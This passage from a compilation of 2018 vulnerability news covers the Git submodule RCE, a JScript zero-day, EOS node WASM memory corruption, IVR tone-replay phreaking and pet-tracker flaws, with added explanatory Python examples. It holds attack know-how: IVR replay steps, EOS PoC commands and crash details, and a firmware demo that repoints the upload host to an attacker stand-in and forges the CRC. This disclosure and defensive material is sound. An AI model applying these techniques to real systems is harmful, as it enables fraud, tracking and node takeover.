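As an added illustration of the traversal rule the advisory describes (a simplified check, not Git's own fsck code), the following script parses a constructed .gitmodules file and flags submodule names that would climb out of $GIT_DIR/modules, the kind of name a hosting service would want to reject at push time:

```python
"""Flag .gitmodules submodule names that would escape $GIT_DIR/modules.

Added example, not Git's own fsck code: a simplified version of the rule the
advisory describes, since Git derives the submodule's repository path from the
name in .gitmodules. The sample file below is constructed for the demo.
"""
import re

# Matches a section header such as: [submodule "vendor/libfoo"]
SECTION_RE = re.compile(r'^\s*\[submodule\s+"([^"]*)"\]\s*$')


def parse_submodule_names(gitmodules_text):
    """Return the submodule names declared in a .gitmodules file, in order."""
    return [m.group(1) for m in map(SECTION_RE.match, gitmodules_text.splitlines()) if m]


def is_safe_submodule_name(name):
    """A name is safe only if appending it to $GIT_DIR/modules cannot leave that
    directory: non-empty, relative, forward slashes only, no '..' component."""
    if not name or name.startswith("/") or "\\" in name:
        return False
    return ".." not in name.split("/")


def check_gitmodules(gitmodules_text):
    """Return the names a hosting service should reject before accepting a push."""
    return [n for n in parse_submodule_names(gitmodules_text) if not is_safe_submodule_name(n)]


# Constructed sample: one ordinary submodule and one whose name climbs out of
# $GIT_DIR/modules, the pattern CVE-2018-11235 relies on.
SAMPLE_GITMODULES = """\
[submodule "lib/ok"]
\tpath = lib/ok
\turl = https://example.invalid/ok.git
[submodule "../../escape"]
\tpath = vendor/x
\turl = https://example.invalid/x.git
"""

if __name__ == "__main__":
    for bad in check_gitmodules(SAMPLE_GITMODULES):
        print("rejected submodule name:", bad)
```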

Major Git hosting services like GitHub and Microsoft have already deployed the security patches.

Edward Thomson, Program Manager for Visual Studio Team Services, confirmed that Git 2.17.1 and Git for Windows 2.17.1 (2) already include the fix for the flaws and encourages all users to update their Git clients as soon as possible.

Thomson published a technical analysis for the CVE-2018-11235 vulnerability.


Expert found a zero-day RCE in Microsoft Windows JScript component
30.5.2018 securityaffairs
Vulnerebility  

Dmitri Kaslov, a security researcher at Telspace Systems, discovered a vulnerability in the JScript component of the Windows operating system that can be exploited by an attacker to execute malicious code on a target computer.
Kaslov disclosed the zero-day flaw through the Trend Micro Zero-Day Initiative (ZDI) back in January, then ZDI experts reported it to Microsoft.

After four months Microsoft has yet to roll out a patch for the flaw, so ZDI decided to publish part of its technical analysis of the vulnerability.

ZDI usually waits 120 days before publicly disclosing a flaw.

“This vulnerability allows remote attackers to execute arbitrary code on vulnerable installations of Microsoft Windows. User interaction is required to exploit this vulnerability in that the target must visit a malicious page or open a malicious file.” reads the advisory published by ZDI.

“The specific flaw exists within the handling of Error objects in JScript. By performing actions in script, an attacker can cause a pointer to be reused after it has been freed. An attacker can leverage this vulnerability to execute code under the context of the current process.”

The vulnerability received a 6.8 rating out of 10 on the CVSSv2 severity scale.

Microsoft Windows JScript component

To exploit the vulnerability, the attacker has to trick victims into visiting a malicious web page, or into downloading and opening a malicious JS file on the system.

The good news is that the vulnerability does not allow a full system compromise on its own, because the attacker's code runs only within a sandboxed environment.

Of course, an attacker can chain this vulnerability with a sandbox-escape exploit and then execute their own code on the target system.

Microsoft is working on a security update.

Below the timeline for the vulnerability:

01/23/18 – ZDI sent the vulnerability report to the vendor
01/23/18 – The vendor acknowledged and provided a case number
04/23/18 – The vendor replied that they were having difficulty reproducing the issue report without POC
04/24/18 – ZDI confirmed the POC was sent with the original and sent it again
05/01/18 – The vendor acknowledged receipt of the POC
05/08/18 – The vendor requested an extension
05/18/18 – ZDI replied “We have verified that we sent the POC with the original. The report will 0-day on May 29.”

ZDI said it was not aware of any attempts to exploit this vulnerability in the wild.


Remote Code Execution Vulnerability Patched in Git
30.5.2018 securityweek 
Vulnerebility 

Updates released on Tuesday for the Git version control system patch two security flaws, including a serious vulnerability that can be exploited for remote code execution using specially crafted repositories.

The security holes, tracked as CVE-2018-11235 and CVE-2018-11233, have been addressed with the release of Git v2.17.1, v2.13.7, v2.14.4, v2.15.2 and v2.16.4.

The more serious of them, CVE-2018-11235, is related to submodule names and recursively cloning repositories. The issue was discovered by Etienne Stalmans, who reported it through GitHub’s bug bounty program.

Microsoft’s Visual Studio Team Services (VSTS) team has provided some information about the vulnerability, instructions on how users can check if they are impacted, and the steps that need to be taken to mitigate the risks on each platform.

Edward Thomson, a program manager for Git in Microsoft's Visual Studio Team Services, has provided the following description of the vulnerability:

“When a Git repository contains a submodule, that submodule's repository structure is stored alongside the parent's, inside the .git folder. This structure is generally stored in a folder with the same name as the submodule, however the name of this folder is configurable by a file in the parent repository.

Vulnerable versions of git allow the folder name to contain a path that is not necessarily beneath the .git directory. This can allow an attacker to carefully create a parent repository that has another Git repository checked in, as a folder inside that parent repository. Then that repository that's checked in can be added as a submodule to the parent repository. That submodule's location can be set outside of the .git folder, pointing to the checked-in repository inside the parent itself.

When you recursively clone this parent repository, Git will look at the submodule that has been configured, then look for where to store that submodule's repository. It will follow the configuration into the parent repository itself, to the repository that's been checked in as a folder. That repository will be used to check out the submodule… and, unfortunately, any hooks in that checked-in repository will be run.

So the attacker can bundle this repository configuration with a malicious post-checkout hook, and their code will be executed immediately upon your (recursive) clone of the repository.”

Microsoft, GitLab, GitHub and likely other Git hosting providers have taken steps to prevent abuse. However, users have still been advised to update their Git clients.

The second flaw is considered less serious. The issue is related to Git performing “path sanity-checks on NTFS that can be fooled into reading arbitrary memory.”
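The mechanism Thomson describes turns on the submodule name: vulnerable clients use it as a directory name under .git/modules/, so a name containing ".." can point at a directory checked into the parent repository. The following is an added example in Python, not Git's own code, of the kind of check that the server-side receive.fsckObjects rejection performs. It parses a .gitmodules file and refuses any submodule whose name is absolute or climbs out with a ".." component; the extra rule rejecting a ".git" component and the sample .gitmodules text are assumptions made for the demo.

```python
"""Reject submodule names that would escape .git/modules/ (CVE-2018-11235 check).

Added example, not Git's own code. The submodule *name* (not its path) is
what vulnerable clients use as a directory under .git/modules/, so it must
stay a plain relative name. The .gitmodules sample is constructed.
"""
import re

SECTION_RE = re.compile(r'^\s*\[submodule\s+"(.*)"\]\s*$')
KEY_RE = re.compile(r'^\s*([A-Za-z][A-Za-z0-9-]*)\s*=\s*(.*?)\s*$')


def parse_gitmodules(text):
    """Return {name: {key: value}} for every [submodule "name"] section."""
    modules = {}
    current = None
    for line in text.splitlines():
        stripped = line.strip()
        if not stripped or stripped[0] in "#;":
            continue  # blank line or comment
        m = SECTION_RE.match(line)
        if m:
            current = modules.setdefault(m.group(1), {})
            continue
        m = KEY_RE.match(line)
        if m and current is not None:
            current[m.group(1).lower()] = m.group(2)
    return modules


def unsafe_name_reason(name):
    """Why `name` must be rejected, or None if it is a plain relative name."""
    if not name:
        return "empty name"
    # Treat '\' as a separator too: Git for Windows is among the affected clients.
    parts = re.split(r"[\\/]+", name)
    if name.startswith(("/", "\\")) or re.match(r"^[A-Za-z]:", name):
        return "absolute path"
    if ".." in parts:
        return "contains '..' component"
    if any(p.lower() == ".git" for p in parts):
        return "contains '.git' component"  # assumption: extra defensive rule
    return None


def check_gitmodules(text):
    """List (name, reason) for every submodule a server should refuse to accept."""
    findings = []
    for name in parse_gitmodules(text):
        reason = unsafe_name_reason(name)
        if reason:
            findings.append((name, reason))
    return findings


# Constructed sample: one honest submodule and one whose name climbs out of
# .git/modules/ into a directory checked into the parent repository.
SAMPLE_GITMODULES = """\
[submodule "libfoo"]
\tpath = libfoo
\turl = https://example.invalid/libfoo.git
[submodule "../../checked-in-repo"]
\tpath = vendor/evil
\turl = https://example.invalid/evil.git
"""

if __name__ == "__main__":
    for name, reason in check_gitmodules(SAMPLE_GITMODULES):
        print("reject submodule %r: %s" % (name, reason))
```

Hosting operators get the real check by setting receive.fsckObjects on the server, as the release notes recommend; the script above is only useful for scanning repositories you already hold, and it does not replace updating the clients.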


Chrome 67 Patches 34 Vulnerabilities
30.5.2018 securityweek 
Vulnerebility 

Google this week released Chrome 67 to the stable channel to provide various improvements, including patches for 34 vulnerabilities.

After introducing it in Chrome 63 in December, Google is now making Site Isolation available for more users. The functionality ensures that each opened website is rendered in a separate process, thus isolating it from the processes of other websites and delivering stronger security boundaries.

Chrome’s Site Isolation was also meant as a form of mitigation against the web-exploitable Spectre vulnerability affecting modern micro-processors. Since the beginning of the year, together with Meltdown, another CPU flaw, Spectre has fueled an industry-wide race to release patches and mitigations.

“We're continuing to roll out Site Isolation to a larger percentage of the stable population in Chrome 67. Site Isolation improves Chrome's security and helps mitigate the risks posed by Spectre,” Google notes in a blog post.

Of the 34 security fixes delivered in the new browser release, 24 are for vulnerabilities reported by external researchers. These include 9 flaws rated High severity, 12 assessed with a Medium risk, and 3 considered Low severity.

The most important issues addressed in Chrome 67 include Use after free in Blink (CVE-2018-6123), Type confusion in Blink (CVE-2018-6124), Overly permissive policy in WebUSB (CVE-2018-6125), Heap buffer overflow in Skia (CVE-2018-6126), Use after free in indexedDB (CVE-2018-6127), uXSS in Chrome on iOS (CVE-2018-6128), Out of bounds memory access in WebRTC (CVE-2018-6129 and CVE-2018-6130), and Incorrect mutability protection in WebAssembly (CVE-2018-6131).

The Medium severity bugs addressed in this release include Use of uninitialized memory in WebRTC, URL spoof in Omnibox, Referrer Policy bypass in Blink, UI spoofing in Blink, Out of bounds memory access in V8, Leak of visited status of page in Blink, Overly permissive policy in Extensions, Restrictions bypass in the debugger extension API, Heap buffer overflow in Skia, and Out of bounds memory access in V8.

Google also addressed Out of bounds memory access in PDFium, Incorrect escaping of MathML in Blink, and Password fields not taking advantage of OS protections in Views.

The search engine giant paid over $30,000 in bug bounties to the reporting security researchers. However, the company has yet to publish full details on the rewards.


Flaws in IBM QRadar Allow Remote Command Execution
29.5.2018 securityweek
Vulnerebility 

Three vulnerabilities discovered by a researcher in IBM’s QRadar product can be chained for an exploit that allows a remote and unauthenticated attacker to bypass authentication and execute arbitrary commands with root privileges.

IBM QRadar is an enterprise security information and event management (SIEM) product designed to help security analysts identify sophisticated threats on their network and improve incident remediation.

Independent researcher Pedro Ribeiro discovered that IBM QRadar is affected by three potentially serious vulnerabilities, which he reported to the tech giant through Beyond Security’s SecuriTeam Secure Disclosure program.

According to IBM, the security holes impact QRadar SIEM 7.3.0 to 7.3.1 Patch 2, and QRadar SIEM 7.2.0 to 7.2.8 Patch 11. Patches are included in versions 7.3.1 Patch 3 and 7.2.8 Patch 12.

IBM has assigned a CVSS score of only 5.6 to the vulnerabilities, which it collectively tracks as CVE-2018-1418. However, the issues seem serious and an advisory in NIST’s National Vulnerability Database (NVD) shows a score of 9.8, which indicates a “critical” severity rating.

According to Beyond Security, QRadar has a built-in application for performing forensic analysis on files. While the application is disabled in the Community Edition, the code is there and part of it still works.

The application has two components: a Java servlet and the main component, which uses PHP. The first component is affected by a vulnerability that can be exploited to bypass authentication, while the second has a flaw that can be leveraged to download and execute a shell.

The flaw affecting the PHP component requires authentication, but that can be achieved by exploiting the first vulnerability. Chaining these vulnerabilities allows a remote attacker to execute arbitrary commands on the system, but only with low privileges (i.e. “nobody” user). However, Ribeiro discovered a third vulnerability that can be exploited to escalate privileges from “nobody” to root.

Beyond Security has made available technical details and proof-of-concept (PoC) code for these security holes.

Ribeiro has found many serious vulnerabilities in the past years, including in products from Netgear, NUUO, Asus, Kaseya and BMC.


Abusing Interactive Voice Response systems – Legacy Telecom [CVE-2018-11518]
29.5.2018 securityaffairs
Vulnerebility

A vulnerability tracked as CVE-2018-11518 could be exploited by attackers to mount a phreaking attack on HCL legacy Interactive Voice Response (IVR) systems that do not use VoIP.

These IVR systems rely on audio signals of specific frequencies; based on the frequency received, certain commands and functions are processed. Since these frequencies are accepted within a phone call, an attacker can record them and play them back to activate services or obtain sensitive information.

Summary: Dual-tone multi-frequency signaling (DTMF) is the voice-frequency signaling used by Interactive Voice Response systems (IVRs).

Interactive Voice Response systems

For each key pressed, a tone is created by combining the frequencies of the key's row and column on the keypad. For example, the tone for “5” is created by combining 770 Hz and 1336 Hz, and the resulting signal is what the IVR recognizes as “5”.

Abstract: The attack is a phreaking attack on IVR systems that have not yet been fully migrated to VoIP. These IVR systems work on frequency, and based on the frequency received, certain commands and functions are processed. Since the frequencies are generated by the phone, they can be recorded and replayed to activate services or obtain sensitive information for one or multiple users at the same time.

Steps to reproduce the attack:

First, you need a recording of the IVR frequencies, that is, the distinct tone for each digit that the IVR accepts as input. Once the tones are recorded as MP3, M4A or any other format, you can begin.

Call any toll-free number (for example 198 in India) using any telecom operator's SIM. Dial the toll-free number appropriate for your country and operator.

You will hear the recorded voice saying something like “Press 1 for English, 2 for Hindi”. This is the moment to play your recorded tone. Suppose you want to select English: play the tone for key 1 from another device, a laptop, or through speakers. The IVR will take this as input, process it, and set your language to English.

Possible attack scenarios: The scenario above only used the tones for keys 0-9. With the same technique it is possible to disrupt the systems, control any user's IVR input, subscribe to services, change settings, extract information, and also cause a denial of service.

CVE-2018-11518 has been assigned to HCL legacy IVR systems; however, our research suggests that IVRs belonging to vendors such as IBM, COMVIVA and SPICEDIGITAL might be vulnerable to such attacks.
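The reason a recording works is that the IVR decodes nothing but the two sine components of each tone; it cannot tell a handset keypad from a speaker held to the microphone. The following is an added example in Python, not part of the original advisory, that synthesises a DTMF key as the sum of its row and column frequencies (770 Hz + 1336 Hz for “5”, as above) and decodes it with the Goertzel algorithm, the single-bin detector that DTMF receivers typically use. The 8 kHz sample rate, 100 ms tone length and the dominance ratio used to reject noise are assumptions chosen for the demo.

```python
"""Synthesise and decode DTMF digits with the Goertzel algorithm.

Added example, not from the advisory. Demonstrates that any playback of the
two-tone signal, at any volume, decodes to the same key.
"""
import math

ROW_FREQS = (697, 770, 852, 941)          # Hz, keypad rows
COL_FREQS = (1209, 1336, 1477, 1633)      # Hz, keypad columns
KEYPAD = ("123A", "456B", "789C", "*0#D")
SAMPLE_RATE = 8000                        # Hz, assumed telephony rate


def dtmf_freqs(key):
    """Return the (row, column) frequency pair that encodes `key`."""
    for r, row in enumerate(KEYPAD):
        c = row.find(key)
        if c >= 0:
            return ROW_FREQS[r], COL_FREQS[c]
    raise ValueError("not a DTMF key: %r" % key)


def synth_tone(key, duration=0.1, amplitude=0.5):
    """Sum of two sines: what a handset sends, and what a recording plays back."""
    f_row, f_col = dtmf_freqs(key)
    n = int(SAMPLE_RATE * duration)
    return [amplitude * (math.sin(2 * math.pi * f_row * i / SAMPLE_RATE)
                         + math.sin(2 * math.pi * f_col * i / SAMPLE_RATE))
            for i in range(n)]


def goertzel_power(samples, freq):
    """Signal power at `freq`: a single DFT bin, computed without an FFT."""
    n = len(samples)
    k = int(0.5 + n * freq / SAMPLE_RATE)  # nearest bin to the target frequency
    coeff = 2 * math.cos(2 * math.pi * k / n)
    s_prev = s_prev2 = 0.0
    for x in samples:
        s = x + coeff * s_prev - s_prev2
        s_prev2, s_prev = s_prev, s
    return s_prev ** 2 + s_prev2 ** 2 - coeff * s_prev * s_prev2


def decode_tone(samples, min_ratio=4.0):
    """Strongest row and column bin give the key; None if neither clearly dominates."""
    row_p = [goertzel_power(samples, f) for f in ROW_FREQS]
    col_p = [goertzel_power(samples, f) for f in COL_FREQS]
    r = max(range(4), key=row_p.__getitem__)
    c = max(range(4), key=col_p.__getitem__)
    # A real key has one row and one column far above the rest; noise does not.
    other_r = max(p for i, p in enumerate(row_p) if i != r) or 1e-12
    other_c = max(p for i, p in enumerate(col_p) if i != c) or 1e-12
    if row_p[r] / other_r < min_ratio or col_p[c] / other_c < min_ratio:
        return None
    return KEYPAD[r][c]


def decode_sequence(keys):
    """Round-trip a string of keys through synthesis and decoding."""
    return "".join(decode_tone(synth_tone(k)) or "?" for k in keys)


if __name__ == "__main__":
    print("5 is", dtmf_freqs("5"))
    print("decoded:", decode_sequence("198#"))
```

Scaling the samples (a quieter or louder playback) does not change which bins dominate, which is exactly why a tone recorded once and replayed through a laptop speaker is accepted as a key press.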


EOS Node Remote Code Execution Vulnerability — EOS WASM Contract Function Table Array Out of Bounds
29.5.2018 securityaffairs
Vulnerebility

Security experts from the 360 Core Security Team have found and successfully exploited a buffer out-of-bounds write vulnerability in EOS node when parsing a WASM file.
Vulnerability Description
We found and successfully exploited a buffer out-of-bounds write vulnerability in EOS when parsing a WASM file.

To exploit this vulnerability, an attacker could upload a malicious smart contract to the nodeos server; once the contract is parsed by the server, the malicious payload executes on it and takes control of it.

After taking control of the nodeos server, the attacker could then pack the malicious contract into a new block and further control all nodes of the EOS network.

Vulnerability Reporting Timeline
2018-5-11 EOS Out-of-bound Write Vulnerability Found

2018-5-28 Full Exploit Demo of Compromise EOS Super Node Completed

2018-5-28 Vulnerability Details Reported to Vendor

2018-5-29 Vendor Fixed the Vulnerability on Github and Closed the Issue

2018-5-29 Notified the vendor that the fix is not complete

Some Telegram chats with Daniel Larimer:

We tried to report the bug to him. He said they would not ship EOS without fixing it, and asked us to send the report privately since some people are running public test nets.

He provided his mailbox and we sent the report to him.

EOS fixed the vulnerability and Daniel said he would give the acknowledgment.

Technical Detail of the Vulnerability
This is a buffer out-of-bounds write vulnerability

At libraries/chain/webassembly/binaryen.cpp (line 78), function binaryen_runtime::instantiate_module:

    for (auto& segment : module->table.segments) {
        Address offset = ConstantExpressionRunner<TrivialGlobalManager>(globals).visit(segment.offset).value.geti32();
        assert(offset + segment.data.size() <= module->table.initial);
        for (size_t i = 0; i != segment.data.size(); ++i) {
            table[offset + i] = segment.data[i];   // <= OOB write here!
        }
    }

Here table is a std::vector containing the Names in the function table. When storing elements into the table, the |offset| field is not correctly checked. Note that there is an assert before setting the value which checks the offset; unfortunately, |assert| only works in a Debug build and is compiled out of a Release build.

The table is initialized earlier in the statement:

table.resize(module->table.initial);

Here |module->table.initial| is read from the function table declaration section in the WASM file, and the valid range for this field is 0 to 1024.

The |offset| field is also read from the WASM file, in the data section; it is a signed 32-bit value.

So basically with this vulnerability, we can write to a fairly wide range after the table vector’s memory.
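The following is an added example in Python, not EOS or Binaryen code, that models the element-segment copy above with two bounds checks: the original `offset + size <= initial` comparison evaluated in 32-bit arithmetic, and an overflow-free form that a release build would actually enforce. It shows that the PoC offset 0xffffffff wraps straight past the naive comparison (the same class of problem as the incomplete 32-bit fix noted below) and reproduces the 0x7FFFFFFF8 displacement seen in the gdb output. The element size of 8 bytes and the Python list standing in for the std::vector are assumptions for the demo.

```python
"""Bounds-checking a WASM function-table (element) segment.

Added example, not EOS or Binaryen code. Emulates the 32-bit arithmetic of the
vulnerable check and shows the overflow-free replacement.
"""
MASK32 = 0xFFFFFFFF
POC_OFFSET = 0xFFFFFFFF   # the |offset| used by the advisory's crash PoC


def naive_check_passes(offset, size, initial):
    """`offset + size <= initial` in 32-bit unsigned arithmetic: what the
    assert in binaryen.cpp tests when it is compiled in at all."""
    return ((offset + size) & MASK32) <= initial


def safe_check_passes(offset, size, initial):
    """Overflow-free form: the offset must lie inside the table and the room
    left after it must cover the whole segment. Valid for any integer width."""
    return 0 <= offset <= initial and size <= initial - offset


def apply_segment(table, offset, data):
    """Copy `data` into `table` at `offset`, refusing anything out of range.
    Mirrors `table[offset + i] = segment.data[i]` with the check a release
    build of the vulnerable code lacked."""
    if not safe_check_passes(offset, len(data), len(table)):
        raise IndexError("element segment %d+%d exceeds table of %d entries"
                         % (offset, len(data), len(table)))
    for i, name in enumerate(data):
        table[offset + i] = name
    return table


def poc_index_bytes(offset=POC_OFFSET, elem_size=8):
    """Byte displacement of the first write. geti32() reads the offset as a
    signed value (-1), but the indexing multiplies it as unsigned, giving the
    rax value from the gdb dump (assumed 8-byte table entries)."""
    return offset * elem_size


def poc_is_rejected(initial=1024):
    """True if the hardened copy refuses the PoC segment instead of writing."""
    try:
        apply_segment([None] * initial, POC_OFFSET, ["evil"])
    except IndexError:
        return True
    return False


if __name__ == "__main__":
    print("naive check passes PoC:", naive_check_passes(POC_OFFSET, 1, 1024))
    print("safe check passes PoC: ", safe_check_passes(POC_OFFSET, 1, 1024))
    print("first write lands at +0x%X" % poc_index_bytes())
```

The hardened check must run unconditionally; an `assert` is the wrong tool for validating attacker-controlled input because it disappears from release builds, which is the whole reason the loop above wrote out of bounds.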

How to reproduce the vulnerability

Build the release version of the latest EOS code:

    ./eosio-build.sh

Start an EOS node and complete the necessary setup described at:
https://github.com/EOSIO/eos/wiki/Tutorial-Getting-Started-With-Contracts

Set a vulnerable contract. We have provided a proof-of-concept WASM to demonstrate a crash. In our PoC, we simply set the |offset| field to 0xffffffff so that the process crashes immediately when the out-of-bounds write occurs.

To test the PoC:

    cd poc
    cleos set contract eosio ../poc -p eosio

If everything is OK, you will see the nodeos process receive a segmentation fault.

The crash info:

    (gdb) c
    Continuing.

    Program received signal SIGSEGV, Segmentation fault.
    0x0000000000a32f7c in eosio::chain::webassembly::binaryen::binaryen_runtime::instantiate_module(char const*, unsigned long, std::vector<unsigned char, std::allocator<unsigned char> >) ()
    (gdb) x/i $pc
    => 0xa32f7c <_ZN5eosio5chain11webassembly8binaryen16binaryen_runtime18instantiate_moduleEPKcmSt6vectorIhSaIhEE+2972>: mov %rcx,(%rdx,%rax,1)
    (gdb) p $rdx
    $1 = 59699184
    (gdb) p $rax
    $2 = 34359738360

Here |rdx| points to the start of the |table| vector, and |rax| is 0x7FFFFFFF8, which holds the value of |offset| * 8.
Exploit the vulnerability to achieve Remote Code Execution
This vulnerability could be leveraged to achieve remote code execution in the nodeos process by uploading malicious contracts to the victim node and letting the node parse them. In a real attack, the attacker may publish a malicious contract to the EOS main network.

The malicious contract is first parsed by an EOS supernode; the vulnerability is then triggered and the attacker controls the supernode that parsed the contract.

The attacker can steal the private key of super nodes or control content of new blocks. What’s more, attackers can pack the malicious contract into a new block and publish it. As a result, all the full nodes in the entire network will be controlled by the attacker.

We have finished a proof-of-concept exploit, and tested on the nodeos build on 64-bits Ubuntu system. The exploit works like this:

The attacker uploads malicious contracts to the nodeos server.
The server nodeos process parses the malicious contracts, which triggers the vulnerability.
With the out of bound write primitive, we can overwrite the WASM memory buffer of a WASM module instance. And with the help of our malicious WASM code, we finally achieve arbitrary memory read/write in the nodeos process and bypass the common exploit mitigation techniques such as DEP/ASLR on 64-bits OS.
Once successfully exploited, the exploit starts a reverse shell and connects back to the attacker.
You can refer to the video we provided to get some idea about what the exploit looks like, We may provide the full exploit chain later.
The Fix for the Vulnerability
Bytemaster on EOS's GitHub opened issue 3498 for the vulnerability that we reported and fixed the related code.

But, as Yuki commented on the commit, the fix still has problems for a 32-bit process and is not complete.

The 360 Core Security Team credited Yuki Chen of Qihoo 360 Vulcan Team and Zhiniang Peng of Qihoo 360 Core Security for the discovery of the vulnerability.


I know where your pet is
26.5.2018 Kaspersky
Vulnerebility
Kaspersky Lab’s many years of cyberthreat research would suggest that any device with access to the Internet will inevitably be hacked. In recent years, we have seen hacked toys, kettles, cameras, and irons. It would seem that no gadget has escaped the attention of hackers, yet there is one last bastion: “smart” devices for animals. For example, trackers to monitor their location. Such gadgets can have access to the owner’s home network and phone, and their pet’s location.

This report highlights the potential risks for users and manufacturers. In it, we examine several trackers for potential vulnerabilities. For the study, we chose some popular models that have received positive reviews:

Kippy Vita
LINK AKC Smart Dog Collar
Nuzzle Pet Activity and GPS Tracker
TrackR bravo and pixel
Tractive GPS Pet Tracker
Weenect WE301
Whistle 3 GPS Pet Tracker & Activity Monitor
Technologies used: Bluetooth LE
Four of the trackers in the study use Bluetooth Low Energy (BLE), which in many cases is the weak spot in a device’s protective armor. Let’s take a closer look at this technology. BLE is an energy-saving Bluetooth specification widely used in IoT devices. What interests us is the lack of authentication and the availability of services and characteristics.

Unlike “classic” Bluetooth, where peer devices are connected using a PIN code, BLE is aimed at non-peer devices, one of which may not have a screen or keyboard. Thus, PIN code protection is not implemented in BLE — authentication depends entirely on the developers of the device, and experience shows that it is often neglected.

The second feature of interest to us is the availability of services, characteristics, and descriptors. They form the basis for data transfer between devices in the BLE specification. As we already noted, BLE works with non-peer devices, one of which (the one that does the connecting) is usually a smartphone. The other device, in our case, is a tracker. After connecting to it, several BLE services are available to the smartphone. Each of them contains characteristics which in turn may have descriptors. Both characteristics and descriptors can be used for data transfer.

Hence, the correct approach to device security in the case of BLE involves pre-authentication before characteristics and descriptors are made available for reading and writing. Moreover, it is good practice to break the link shortly after connecting if the pre-authentication stage is not passed. In this case, authentication should be based on something secret that is not accessible to the attacker—for example, the first part of the data can be encrypted with a specific key on the server (rather than the app) side. Or transmitted data and the MAC address of the connected device can be confirmed via additional communication channels, for example, a built-in SIM card.

Kippy Vita
This tracker transfers GPS coordinates to the server via its built-in SIM card, and the pet’s location is displayed in the mobile app. The tracker does not interface “directly” with the smartphone. We could not detect any problems in the device itself, so we turned our focus to the mobile apps.

Here, too, everything looked pretty good: SSL Pinning was implemented, unlike in any other app we tested. Moreover, the Android app encrypts important data before saving it to its own folder.

The only problem we did detect was that the app for Android logs data that is transmitted to the server. This data can include the user’s password and login, as well as an authentication token.


Output of the Kippy Vita app with user login and password

Despite the fact that not all apps can read logs (only system apps or ones with superuser rights), it is still a major security issue.

Registered CVE:
CVE-2018-9916

Link AKC
This tracker monitors the pet’s location via GPS and transfers coordinates via the built-in SIM card. What’s more, it can interface with the owner’s phone directly — via Bluetooth LE. And this means that it is always ready to connect devices, which makes a good starting point for the study.

We were pleasantly surprised by Link AKC: the developers did everything right in terms of securing the connection to the smartphone. We couldn’t find any major problems, which is rare for devices with BLE support.

After the smartphone connects to the device and discovers services, it should enable notifications (that is, inform the tracker of expected changes) in two characteristics and a descriptor (otherwise the tracker breaks the link). After that Link AKC is ready to receive commands. They should contain the user ID; if the user does not have rights to use the tracker, the command is not executed. This maintains control over access rights. Even using the ID obtained from the tested device, we could not make the gadget execute a command from another smartphone—it appears that the tracker checks the smartphone’s MAC address.

However, the device cannot be described as completely secure. In the app for Android, we found that the developers had forgotten to disable logging. As a result, the app transfers lots of data to logcat, including:

the app’s authorization token, which if intercepted can be used to sign into the service and discover the pet’s location:

User registration data, including name and email address:

Device coordinates:

Starting with Android 4.1, only some system apps or apps with superuser rights can read the logs of other programs. It is also possible to gain access when connecting the smartphone to a computer, but this requires Android developer mode to be activated.

Despite these restrictions, it is still a problem: attackers can get hold of data to access the victim’s account, even if the likelihood of this happening is small.

On top of that, the Android app does not verify the server’s HTTPS certificate, exposing it to man-in-the-middle (MITM) attacks. For a successful attack, attackers need only install their own certificate on the smartphone (which is quite simple to do), allowing them to intercept all transmitted data, including passwords and tokens used for account access:


The Link AKC app for Android is vulnerable to MITM attacks

The authorization token is also stored in unencrypted form in the app folder. Although superuser rights are needed to access it, it is still not the best place to store important data.

The authorization token is stored in unencrypted form

Registered CVE:
CVE-2018-7041

Nuzzle
In terms of functionality, Nuzzle is like the previous tracker: it too uses a SIM card to transmit the pet’s GPS coordinates and can connect directly to a smartphone via BLE. But on the latter point, Nuzzle performed less well than Link AKC: the lack of authorization and access control means that the device is ready to interface with any smartphone. This lets an attacker take control of the device just as the owner would. For example, they can quickly discharge the battery by turning on the light (for which the value of just one attribute needs changing).

An attacker can receive data from the device as soon as a connection is made. Data is available in two characteristics: one contains telemetry information, including device location, while the other provides device status information (in particular, temperature and battery charge).

What is worse, the continuous reading of data from the telemetry characteristic results in the device being “lost”: to save battery power, the gadget does not transmit coordinates via the mobile network if they have already been sent via BLE. Thus, it is possible to conceal the location of the pet simply by connecting to the tracker using a smartphone.

We detected another security hole in the process of updating the device firmware. The integrity control was found to be easy to bypass. Basically, the firmware consists of two files with the extensions DAT and BIN. The first contains information about the firmware, including the checksum (CRC16) used in the integrity control, and the second contains the firmware itself. All it takes to install modified software on the tracker is to change the checksum in the DAT file.

AT commands in Nuzzle firmware

To cripple the device, we didn’t even need to analyze the firmware: it is not encrypted or packed, so just by opening it in a hex editor we were able to find the AT commands and the host used to send data by means of the SIM card. After we changed several bytes in the host, updated the firmware checksum, and uploaded it to the device, the tracker stopped working.
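A CRC detects accidental corruption, not deliberate modification: whoever can edit the BIN image can recompute the checksum in the DAT file, which is exactly the bypass described above. The following is an added example in Python, not Nuzzle's format or code. The DAT layout (a 2-byte little-endian CRC-16 over the BIN image), the CRC variant, the embedded AT command string and the firmware bytes are all constructed assumptions; the example shows the checksum being refreshed after the upload host is swapped, and contrasts it with a keyed MAC (HMAC-SHA256 with a secret held by the device and vendor) that the same edit cannot satisfy.

```python
"""Why a CRC in a firmware header is not an integrity control.

Added example, not the tracker's real format. The DAT header layout, CRC
variant and firmware bytes are constructed for the demo.
"""
import hashlib
import hmac
import struct


def crc16(data, init=0x0000):
    """Bitwise CRC-16/ARC (reflected polynomial 0xA001). The tracker's actual
    variant is unknown; every CRC shares the weakness shown here."""
    crc = init
    for byte in data:
        crc ^= byte
        for _ in range(8):
            crc = (crc >> 1) ^ 0xA001 if crc & 1 else crc >> 1
    return crc & 0xFFFF


def make_dat(bin_image):
    """Constructed DAT header: little-endian CRC-16 of the BIN image."""
    return struct.pack("<H", crc16(bin_image))


def crc_verify(dat, bin_image):
    """What a CRC-only updater checks before flashing."""
    return struct.unpack("<H", dat[:2])[0] == crc16(bin_image)


def patch_and_refresh(bin_image, old, new):
    """The attacker's step: swap the upload host, then recompute the checksum."""
    patched = bin_image.replace(old, new)
    return make_dat(patched), patched


def make_signed_dat(bin_image, key):
    """Hardened header: a keyed MAC over the image (key never leaves vendor/device)."""
    return hmac.new(key, bin_image, hashlib.sha256).digest()


def mac_verify(dat, bin_image, key):
    """Constant-time comparison of the stored MAC against a fresh one."""
    return hmac.compare_digest(dat, make_signed_dat(bin_image, key))


# Constructed firmware image with an AT command and the upload host embedded,
# unencrypted, the way the article says the real image could be read in a hex editor.
FIRMWARE = b"\x00\x10\x20AT+HTTPPARA=\"URL\",\"http://tracker.example.invalid/api\"\x00"
OLD_HOST = b"tracker.example.invalid"
NEW_HOST = b"attacker.example.invalid"

if __name__ == "__main__":
    dat = make_dat(FIRMWARE)
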